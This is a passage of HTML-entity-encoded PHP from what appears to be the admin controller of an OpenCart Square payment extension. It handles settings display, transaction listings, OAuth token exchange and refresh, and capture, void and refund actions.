            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;marketplace/extension&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;type=payment&#039;, true)
        );

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;heading_title&#039;),
            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true)
        );

        $data[&#039;action&#039;] = html_entity_decode($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        $data[&#039;action_save_auth&#039;] = html_entity_decode($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;save_and_auth=1&#039;, true));
        $data[&#039;cancel&#039;] = html_entity_decode($this-&gt;url-&gt;link(&#039;marketplace/extension&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;type=payment&#039;, true));
        $data[&#039;url_list_transactions&#039;] = html_entity_decode($this-&gt;url-&gt;link(&#039;extension/payment/squareup/transactions&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;page={PAGE}&#039;, true));

        $this-&gt;load-&gt;model(&#039;localisation/language&#039;);
        $data[&#039;languages&#039;] = array();
        foreach ($this-&gt;model_localisation_language-&gt;getLanguages() as $language) {
            $data[&#039;languages&#039;][] = array(
                &#039;language_id&#039; =&gt; $language[&#039;language_id&#039;],
                &#039;name&#039; =&gt; $language[&#039;name&#039;] . ($language[&#039;code&#039;] == $this-&gt;config-&gt;get(&#039;config_language&#039;) ? $this-&gt;language-&gt;get(&#039;text_default&#039;) : &#039;&#039;),
                &#039;image&#039; =&gt; &#039;language/&#039; . $language[&#039;code&#039;] . &#039;/&#039;. $language[&#039;code&#039;] . &#039;.png&#039;
            );
        }

        $this-&gt;load-&gt;model(&#039;localisation/order_status&#039;);
        $data[&#039;order_statuses&#039;] = $this-&gt;model_localisation_order_status-&gt;getOrderStatuses();

        $this-&gt;load-&gt;model(&#039;localisation/geo_zone&#039;);
        $data[&#039;geo_zones&#039;] = $this-&gt;model_localisation_geo_zone-&gt;getGeoZones();

        $data[&#039;payment_squareup_cron_command&#039;] = PHP_BINDIR . &#039;/php -d session.save_path=&#039; . session_save_path() . &#039; &#039; . DIR_SYSTEM . &#039;library/squareup/cron.php &#039; . parse_url($server, PHP_URL_HOST) . &#039; 443 &gt; /dev/null 2&gt; /dev/null&#039;;
        
        if (!$this-&gt;config-&gt;get(&#039;payment_squareup_cron_token&#039;)) {
            $data[&#039;payment_squareup_cron_token&#039;] = md5(mt_rand());
        }

        $data[&#039;payment_squareup_cron_url&#039;] = &#039;https://&#039; . parse_url($server, PHP_URL_HOST) . dirname(parse_url($server, PHP_URL_PATH)) . &#039;/index.php?route=extension/recurring/squareup/recurring&amp;cron_token={CRON_TOKEN}&#039;;

        $data[&#039;catalog&#039;] = $this-&gt;request-&gt;server[&#039;HTTPS&#039;] ? HTTPS_CATALOG : HTTP_CATALOG;

        // API login
        $this-&gt;load-&gt;model(&#039;user/api&#039;);

        $api_info = $this-&gt;model_user_api-&gt;getApi($this-&gt;config-&gt;get(&#039;config_api_id&#039;));

        if ($api_info &amp;&amp; $this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;sale/order&#039;)) {
            $session = new Session($this-&gt;config-&gt;get(&#039;session_engine&#039;), $this-&gt;registry);
            
            $session-&gt;start();
                    
            $this-&gt;model_user_api-&gt;deleteApiSessionBySessonId($session-&gt;getId());
            
            $this-&gt;model_user_api-&gt;addApiSession($api_info[&#039;api_id&#039;], $session-&gt;getId(), $this-&gt;request-&gt;server[&#039;REMOTE_ADDR&#039;]);
            
            $session-&gt;data[&#039;api_id&#039;] = $api_info[&#039;api_id&#039;];

            $data[&#039;api_token&#039;] = $session-&gt;getId();
        } else {
            $data[&#039;api_token&#039;] = &#039;&#039;;
        }

        $data[&#039;header&#039;] = $this-&gt;load-&gt;controller(&#039;common/header&#039;);
        $data[&#039;column_left&#039;] = $this-&gt;load-&gt;controller(&#039;common/column_left&#039;);
        $data[&#039;footer&#039;] = $this-&gt;load-&gt;controller(&#039;common/footer&#039;);

        $data[&#039;alerts&#039;] = $this-&gt;pullAlerts();

        $this-&gt;clearAlerts();

        $this-&gt;response-&gt;setOutput($this-&gt;load-&gt;view(&#039;extension/payment/squareup&#039;, $data));
    }

    public function transaction_info() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;library(&#039;squareup&#039;);

        if (isset($this-&gt;request-&gt;get[&#039;squareup_transaction_id&#039;])) {
            $squareup_transaction_id = $this-&gt;request-&gt;get[&#039;squareup_transaction_id&#039;];
        } else {
            $squareup_transaction_id = 0;
        }

        $transaction_info = $this-&gt;model_extension_payment_squareup-&gt;getTransaction($squareup_transaction_id);

        if (empty($transaction_info)) {
            $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        }

        $this-&gt;document-&gt;setTitle(sprintf($this-&gt;language-&gt;get(&#039;heading_title_transaction&#039;), $transaction_info[&#039;transaction_id&#039;]));

        $data[&#039;alerts&#039;] = $this-&gt;pullAlerts();

        $this-&gt;clearAlerts();

        $data[&#039;text_edit&#039;] = sprintf($this-&gt;language-&gt;get(&#039;heading_title_transaction&#039;), $transaction_info[&#039;transaction_id&#039;]);

        $amount = $this-&gt;currency-&gt;format($transaction_info[&#039;transaction_amount&#039;], $transaction_info[&#039;transaction_currency&#039;]);

        $data[&#039;confirm_capture&#039;] = sprintf($this-&gt;language-&gt;get(&#039;text_confirm_capture&#039;), $amount);
        $data[&#039;confirm_void&#039;] = sprintf($this-&gt;language-&gt;get(&#039;text_confirm_void&#039;), $amount);
        $data[&#039;confirm_refund&#039;] = $this-&gt;language-&gt;get(&#039;text_confirm_refund&#039;);
        $data[&#039;insert_amount&#039;] = sprintf($this-&gt;language-&gt;get(&#039;text_insert_amount&#039;), $amount, $transaction_info[&#039;transaction_currency&#039;]);
        $data[&#039;text_loading&#039;] = $this-&gt;language-&gt;get(&#039;text_loading_short&#039;);
        
        $data[&#039;billing_address_company&#039;] = $transaction_info[&#039;billing_address_company&#039;];
        $data[&#039;billing_address_street&#039;] = $transaction_info[&#039;billing_address_street_1&#039;] . &#039; &#039; . $transaction_info[&#039;billing_address_street_2&#039;];
        $data[&#039;billing_address_city&#039;] = $transaction_info[&#039;billing_address_city&#039;];
        $data[&#039;billing_address_postcode&#039;] = $transaction_info[&#039;billing_address_postcode&#039;];
        $data[&#039;billing_address_province&#039;] = $transaction_info[&#039;billing_address_province&#039;];
        $data[&#039;billing_address_country&#039;] = $transaction_info[&#039;billing_address_country&#039;];

        $data[&#039;transaction_id&#039;] = $transaction_info[&#039;transaction_id&#039;];
        $data[&#039;merchant&#039;] = $transaction_info[&#039;merchant_id&#039;];
        $data[&#039;order_id&#039;] = $transaction_info[&#039;order_id&#039;];
        $data[&#039;type&#039;] = $transaction_info[&#039;transaction_type&#039;];
        $data[&#039;amount&#039;] = $amount;
        $data[&#039;currency&#039;] = $transaction_info[&#039;transaction_currency&#039;];
        $data[&#039;browser&#039;] = $transaction_info[&#039;device_browser&#039;];
        $data[&#039;ip&#039;] = $transaction_info[&#039;device_ip&#039;];
        $data[&#039;date_created&#039;] = date($this-&gt;language-&gt;get(&#039;datetime_format&#039;), strtotime($transaction_info[&#039;created_at&#039;]));
        
        $data[&#039;cancel&#039;] = $this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;tab=tab-transaction&#039;, true);

        $data[&#039;url_order&#039;] = $this-&gt;url-&gt;link(&#039;sale/order/info&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;order_id=&#039; . $transaction_info[&#039;order_id&#039;], true);
        $data[&#039;url_void&#039;] = $this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039; . &#039;/void&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;preserve_alert=true&amp;squareup_transaction_id=&#039; . $transaction_info[&#039;squareup_transaction_id&#039;], true);
        $data[&#039;url_capture&#039;] = $this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039; . &#039;/capture&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;preserve_alert=true&amp;squareup_transaction_id=&#039; . $transaction_info[&#039;squareup_transaction_id&#039;], true);
        $data[&#039;url_refund&#039;] = $this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039; . &#039;/refund&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;preserve_alert=true&amp;squareup_transaction_id=&#039; . $transaction_info[&#039;squareup_transaction_id&#039;], true);
        $data[&#039;url_transaction&#039;] = sprintf(
            Squareup::VIEW_TRANSACTION_URL,
            $transaction_info[&#039;transaction_id&#039;],
            $transaction_info[&#039;location_id&#039;]
        );

        $data[&#039;is_authorized&#039;] = in_array($transaction_info[&#039;transaction_type&#039;], array(&#039;AUTHORIZED&#039;));
        $data[&#039;is_captured&#039;] = in_array($transaction_info[&#039;transaction_type&#039;], array(&#039;CAPTURED&#039;));

        $data[&#039;has_refunds&#039;] = (bool)$transaction_info[&#039;is_refunded&#039;];

        if ($data[&#039;has_refunds&#039;]) {
            $refunds = @json_decode($transaction_info[&#039;refunds&#039;], true);

            $data[&#039;refunds&#039;] = array();

            $data[&#039;text_refunds&#039;] = sprintf($this-&gt;language-&gt;get(&#039;text_refunds&#039;), count($refunds));

            foreach ($refunds as $refund) {
                $amount = $this-&gt;currency-&gt;format(
                    $this-&gt;squareup-&gt;standardDenomination(
                        $refund[&#039;amount_money&#039;][&#039;amount&#039;], 
                        $refund[&#039;amount_money&#039;][&#039;currency&#039;]
                    ), 
                    $refund[&#039;amount_money&#039;][&#039;currency&#039;]
                );

                $fee = $this-&gt;currency-&gt;format(
                    $this-&gt;squareup-&gt;standardDenomination(
                        $refund[&#039;processing_fee_money&#039;][&#039;amount&#039;], 
                        $refund[&#039;processing_fee_money&#039;][&#039;currency&#039;]
                    ), 
                    $refund[&#039;processing_fee_money&#039;][&#039;currency&#039;]
                );

                $data[&#039;refunds&#039;][] = array(
                    &#039;date_created&#039; =&gt; date($this-&gt;language-&gt;get(&#039;datetime_format&#039;), strtotime($refund[&#039;created_at&#039;])),
                    &#039;reason&#039; =&gt; $refund[&#039;reason&#039;],
                    &#039;status&#039; =&gt; $refund[&#039;status&#039;],
                    &#039;amount&#039; =&gt; $amount,
                    &#039;fee&#039; =&gt; $fee
                );
            }
        }

        $data[&#039;breadcrumbs&#039;] = array();

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_home&#039;),
            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;common/dashboard&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true)
        );

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_extension&#039;),
            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;marketplace/extension&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;type=payment&#039;, true)
        );

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;heading_title&#039;),
            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true)
        );

        $data[&#039;breadcrumbs&#039;][] = array(
            &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;heading_title_transaction&#039;), $transaction_info[&#039;squareup_transaction_id&#039;]),
            &#039;href&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup/transaction_info&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;squareup_transaction_id=&#039; . $squareup_transaction_id, true)
        );

        $data[&#039;catalog&#039;] = $this-&gt;request-&gt;server[&#039;HTTPS&#039;] ? HTTPS_CATALOG : HTTP_CATALOG;

        // API login
        $this-&gt;load-&gt;model(&#039;user/api&#039;);

        $api_info = $this-&gt;model_user_api-&gt;getApi($this-&gt;config-&gt;get(&#039;config_api_id&#039;));

        if ($api_info &amp;&amp; $this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;sale/order&#039;)) {
            $session = new Session($this-&gt;config-&gt;get(&#039;session_engine&#039;), $this-&gt;registry);
            
            $session-&gt;start();
                    
            $this-&gt;model_user_api-&gt;deleteApiSessionBySessonId($session-&gt;getId());
            
            $this-&gt;model_user_api-&gt;addApiSession($api_info[&#039;api_id&#039;], $session-&gt;getId(), $this-&gt;request-&gt;server[&#039;REMOTE_ADDR&#039;]);
            
            $session-&gt;data[&#039;api_id&#039;] = $api_info[&#039;api_id&#039;];

            $data[&#039;api_token&#039;] = $session-&gt;getId();
        } else {
            $data[&#039;api_token&#039;] = &#039;&#039;;
        }

        $data[&#039;header&#039;] = $this-&gt;load-&gt;controller(&#039;common/header&#039;);
        $data[&#039;column_left&#039;] = $this-&gt;load-&gt;controller(&#039;common/column_left&#039;);
        $data[&#039;footer&#039;] = $this-&gt;load-&gt;controller(&#039;common/footer&#039;);

        $this-&gt;response-&gt;setOutput($this-&gt;load-&gt;view(&#039;extension/payment/squareup_transaction_info&#039;, $data));
    }

    public function transactions() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);

        if (isset($this-&gt;request-&gt;get[&#039;page&#039;])) {
            $page = (int)$this-&gt;request-&gt;get[&#039;page&#039;];
        } else {
            $page = 1;
        }

        $result = array(
            &#039;transactions&#039; =&gt; array(),
            &#039;pagination&#039; =&gt; &#039;&#039;
        );

        $filter_data = array(
            &#039;start&#039; =&gt; ($page - 1) * (int)$this-&gt;config-&gt;get(&#039;config_limit_admin&#039;),
            &#039;limit&#039; =&gt; $this-&gt;config-&gt;get(&#039;config_limit_admin&#039;)
        );

        if (isset($this-&gt;request-&gt;get[&#039;order_id&#039;])) {
            $filter_data[&#039;order_id&#039;] = $this-&gt;request-&gt;get[&#039;order_id&#039;];
        }

        $transactions_total = $this-&gt;model_extension_payment_squareup-&gt;getTotalTransactions($filter_data);
        $transactions = $this-&gt;model_extension_payment_squareup-&gt;getTransactions($filter_data);

        $this-&gt;load-&gt;model(&#039;sale/order&#039;);

        foreach ($transactions as $transaction) {
            $amount = $this-&gt;currency-&gt;format($transaction[&#039;transaction_amount&#039;], $transaction[&#039;transaction_currency&#039;]);

            $order_info = $this-&gt;model_sale_order-&gt;getOrder($transaction[&#039;order_id&#039;]);
            
            $result[&#039;transactions&#039;][] = array(
                &#039;squareup_transaction_id&#039; =&gt; $transaction[&#039;squareup_transaction_id&#039;],
                &#039;transaction_id&#039; =&gt; $transaction[&#039;transaction_id&#039;],
                &#039;url_order&#039; =&gt; $this-&gt;url-&gt;link(&#039;sale/order/info&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;order_id=&#039; . $transaction[&#039;order_id&#039;], true),
                &#039;url_void&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup/void&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;squareup_transaction_id=&#039; . $transaction[&#039;squareup_transaction_id&#039;], true),
                &#039;url_capture&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup/capture&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;squareup_transaction_id=&#039; . $transaction[&#039;squareup_transaction_id&#039;], true),
                &#039;url_refund&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup/refund&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;squareup_transaction_id=&#039; . $transaction[&#039;squareup_transaction_id&#039;], true),
                &#039;confirm_capture&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_confirm_capture&#039;), $amount),
                &#039;confirm_void&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_confirm_void&#039;), $amount),
                &#039;confirm_refund&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_confirm_refund&#039;),
                &#039;insert_amount&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;text_insert_amount&#039;), $amount, $transaction[&#039;transaction_currency&#039;]),
                &#039;order_id&#039; =&gt; $transaction[&#039;order_id&#039;],
                &#039;type&#039; =&gt; $transaction[&#039;transaction_type&#039;],
                &#039;num_refunds&#039; =&gt; count(@json_decode($transaction[&#039;refunds&#039;], true)),
                &#039;amount&#039; =&gt; $amount,
                &#039;customer&#039; =&gt; $order_info[&#039;firstname&#039;] . &#039; &#039; . $order_info[&#039;lastname&#039;],
                &#039;ip&#039; =&gt; $transaction[&#039;device_ip&#039;],
                &#039;date_created&#039; =&gt; date($this-&gt;language-&gt;get(&#039;datetime_format&#039;), strtotime($transaction[&#039;created_at&#039;])),
                &#039;url_info&#039; =&gt; $this-&gt;url-&gt;link(&#039;extension/payment/squareup/transaction_info&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;squareup_transaction_id=&#039; . $transaction[&#039;squareup_transaction_id&#039;], true)
            );
        }

        $pagination = new Pagination();
        $pagination-&gt;total = $transactions_total;
        $pagination-&gt;page = $page;
        $pagination-&gt;limit = $this-&gt;config-&gt;get(&#039;config_limit_admin&#039;);
        $pagination-&gt;url = &#039;{page}&#039;;

        $result[&#039;pagination&#039;] = $pagination-&gt;render();

        $this-&gt;response-&gt;addHeader(&#039;Content-Type: application/json&#039;);
        $this-&gt;response-&gt;setOutput(json_encode($result));
    }

    public function refresh_token() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;extension/payment/squareup&#039;)) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_permission&#039;)
            ));

            $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        }

        $this-&gt;load-&gt;model(&#039;setting/setting&#039;);

        $this-&gt;load-&gt;library(&#039;squareup&#039;);

        try {
            $response = $this-&gt;squareup-&gt;refreshToken();

            if (!isset($response[&#039;access_token&#039;]) || !isset($response[&#039;token_type&#039;]) || !isset($response[&#039;expires_at&#039;]) || !isset($response[&#039;merchant_id&#039;]) ||
                $response[&#039;merchant_id&#039;] != $this-&gt;config-&gt;get(&#039;payment_squareup_merchant_id&#039;)) {
                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;danger&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_refresh_access_token&#039;) 
                ));
            } else {
                $settings = $this-&gt;model_setting_setting-&gt;getSetting(&#039;payment_squareup&#039;);

                $settings[&#039;payment_squareup_access_token&#039;] = $response[&#039;access_token&#039;]; 
                $settings[&#039;payment_squareup_access_token_expires&#039;] = $response[&#039;expires_at&#039;];

                $this-&gt;model_setting_setting-&gt;editSetting(&#039;payment_squareup&#039;, $settings); 

                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;success&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_refresh_access_token_success&#039;)
                ));
            }
        } catch (\Squareup\Exception $e) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;error_token&#039;), $e-&gt;getMessage())
            ));
        }

        $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
    }

    public function oauth_callback() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;extension/payment/squareup&#039;)) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_permission&#039;)
            ));

            $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        }

        $this-&gt;load-&gt;model(&#039;setting/setting&#039;);

        $this-&gt;load-&gt;library(&#039;squareup&#039;);

        if (isset($this-&gt;request-&gt;get[&#039;error&#039;]) || isset($this-&gt;request-&gt;get[&#039;error_description&#039;])) {
            // auth error
            if ($this-&gt;request-&gt;get[&#039;error&#039;] == &#039;access_denied&#039; &amp;&amp; $this-&gt;request-&gt;get[&#039;error_description&#039;] == &#039;user_denied&#039;) {
                // user rejected giving auth permissions to his store
                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;warning&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_user_rejected_connect_attempt&#039;)
                ));
            }

            $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        }

        // verify parameters for the redirect from Square (against random url crawling)
        if (!isset($this-&gt;request-&gt;get[&#039;state&#039;]) || !isset($this-&gt;request-&gt;get[&#039;code&#039;]) || !isset($this-&gt;request-&gt;get[&#039;response_type&#039;])) {
            // missing or wrong info
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_possible_xss&#039;)
            ));

            $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        }

        // verify the state (against cross site requests)
        if (!isset($this-&gt;session-&gt;data[&#039;payment_squareup_oauth_state&#039;]) || $this-&gt;session-&gt;data[&#039;payment_squareup_oauth_state&#039;] != $this-&gt;request-&gt;get[&#039;state&#039;]) {
            // state mismatch
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;error_possible_xss&#039;)
            ));

            $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
        }

        try {
            $token = $this-&gt;squareup-&gt;exchangeCodeForAccessToken($this-&gt;request-&gt;get[&#039;code&#039;]);
            
            $previous_setting = $this-&gt;model_setting_setting-&gt;getSetting(&#039;payment_squareup&#039;);

            $previous_setting[&#039;payment_squareup_locations&#039;] = $this-&gt;squareup-&gt;fetchLocations($token[&#039;access_token&#039;], $first_location_id);

            if (
                !isset($previous_setting[&#039;payment_squareup_location_id&#039;]) || 
                (isset($previous_setting[&#039;payment_squareup_location_id&#039;]) &amp;&amp; !in_array(
                    $previous_setting[&#039;payment_squareup_location_id&#039;], 
                    array_map(
                        function($location) {
                            return $location[&#039;id&#039;];
                        },
                        $previous_setting[&#039;payment_squareup_locations&#039;]
                    )
                ))
            ) {
                $previous_setting[&#039;payment_squareup_location_id&#039;] = $first_location_id;
            }

            if (!$this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_locations&#039;) &amp;&amp; $this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_token&#039;)) {
                $previous_setting[&#039;payment_squareup_sandbox_locations&#039;] = $this-&gt;squareup-&gt;fetchLocations($this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_token&#039;), $first_location_id);
                $previous_setting[&#039;payment_squareup_sandbox_location_id&#039;] = $first_location_id;
            }

            $previous_setting[&#039;payment_squareup_merchant_id&#039;] = $token[&#039;merchant_id&#039;];
            $previous_setting[&#039;payment_squareup_merchant_name&#039;] = &#039;&#039;; // only available in v1 of the API, not populated for now
            $previous_setting[&#039;payment_squareup_access_token&#039;] = $token[&#039;access_token&#039;];
            $previous_setting[&#039;payment_squareup_access_token_expires&#039;] = $token[&#039;expires_at&#039;];

            $this-&gt;model_setting_setting-&gt;editSetting(&#039;payment_squareup&#039;, $previous_setting);

            unset($this-&gt;session-&gt;data[&#039;payment_squareup_oauth_state&#039;]);
            unset($this-&gt;session-&gt;data[&#039;payment_squareup_oauth_redirect&#039;]);

            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;success&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; $this-&gt;language-&gt;get(&#039;text_refresh_access_token_success&#039;)
            ));
        } catch (\Squareup\Exception $e) {
            $this-&gt;pushAlert(array(
                &#039;type&#039; =&gt; &#039;danger&#039;,
                &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                &#039;text&#039; =&gt; sprintf($this-&gt;language-&gt;get(&#039;error_token&#039;), $e-&gt;getMessage())
            ));
        }

        $this-&gt;response-&gt;redirect($this-&gt;url-&gt;link(&#039;extension/payment/squareup&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));
    }

    public function capture() {
        $this-&gt;transactionAction(function($transaction_info, &amp;$json) {
            $updated_transaction = $this-&gt;squareup-&gt;captureTransaction($transaction_info[&#039;location_id&#039;], $transaction_info[&#039;transaction_id&#039;]);

            $status = $updated_transaction[&#039;tenders&#039;][0][&#039;card_details&#039;][&#039;status&#039;];

            $this-&gt;model_extension_payment_squareup-&gt;updateTransaction($transaction_info[&#039;squareup_transaction_id&#039;], $status);

            $json[&#039;order_history_data&#039;] = array(
                &#039;notify&#039; =&gt; 1,
                &#039;order_id&#039; =&gt; $transaction_info[&#039;order_id&#039;],
                &#039;order_status_id&#039; =&gt; $this-&gt;model_extension_payment_squareup-&gt;getOrderStatusId($transaction_info[&#039;order_id&#039;], $status),
                &#039;comment&#039; =&gt; $this-&gt;language-&gt;get(&#039;squareup_status_comment_&#039; . strtolower($status)),
            );

            $json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_success_capture&#039;);
        });
    }

    public function void() {
        $this-&gt;transactionAction(function($transaction_info, &amp;$json) {
            $updated_transaction = $this-&gt;squareup-&gt;voidTransaction($transaction_info[&#039;location_id&#039;], $transaction_info[&#039;transaction_id&#039;]);

            $status = $updated_transaction[&#039;tenders&#039;][0][&#039;card_details&#039;][&#039;status&#039;];

            $this-&gt;model_extension_payment_squareup-&gt;updateTransaction($transaction_info[&#039;squareup_transaction_id&#039;], $status);

            $json[&#039;order_history_data&#039;] = array(
                &#039;notify&#039; =&gt; 1,
                &#039;order_id&#039; =&gt; $transaction_info[&#039;order_id&#039;],
                &#039;order_status_id&#039; =&gt; $this-&gt;model_extension_payment_squareup-&gt;getOrderStatusId($transaction_info[&#039;order_id&#039;], $status),
                &#039;comment&#039; =&gt; $this-&gt;language-&gt;get(&#039;squareup_status_comment_&#039; . strtolower($status)),
            );

            $json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_success_void&#039;);
        });
    }

    public function refund() {
        $this-&gt;transactionAction(function($transaction_info, &amp;$json) {
            if (!empty($this-&gt;request-&gt;post[&#039;reason&#039;])) {
                $reason = $this-&gt;request-&gt;post[&#039;reason&#039;];
            } else {
                $reason = $this-&gt;language-&gt;get(&#039;text_no_reason_provided&#039;);
            }

            if (!empty($this-&gt;request-&gt;post[&#039;amount&#039;])) {
                $amount = preg_replace(&#039;~[^0-9\.\,]~&#039;, &#039;&#039;, $this-&gt;request-&gt;post[&#039;amount&#039;]);

                if (strpos($amount, &#039;,&#039;) !== FALSE &amp;&amp; strpos($amount, &#039;.&#039;) !== FALSE) {
                    $amount = (float)str_replace(&#039;,&#039;, &#039;&#039;, $amount);
                } else if (strpos($amount, &#039;,&#039;) !== FALSE &amp;&amp; strpos($amount, &#039;.&#039;) === FALSE) {
                    $amount = (float)str_replace(&#039;,&#039;, &#039;.&#039;, $amount);
                } else {
                    $amount = (float)$amount;
                }
            } else {
                $amount = 0;
            }
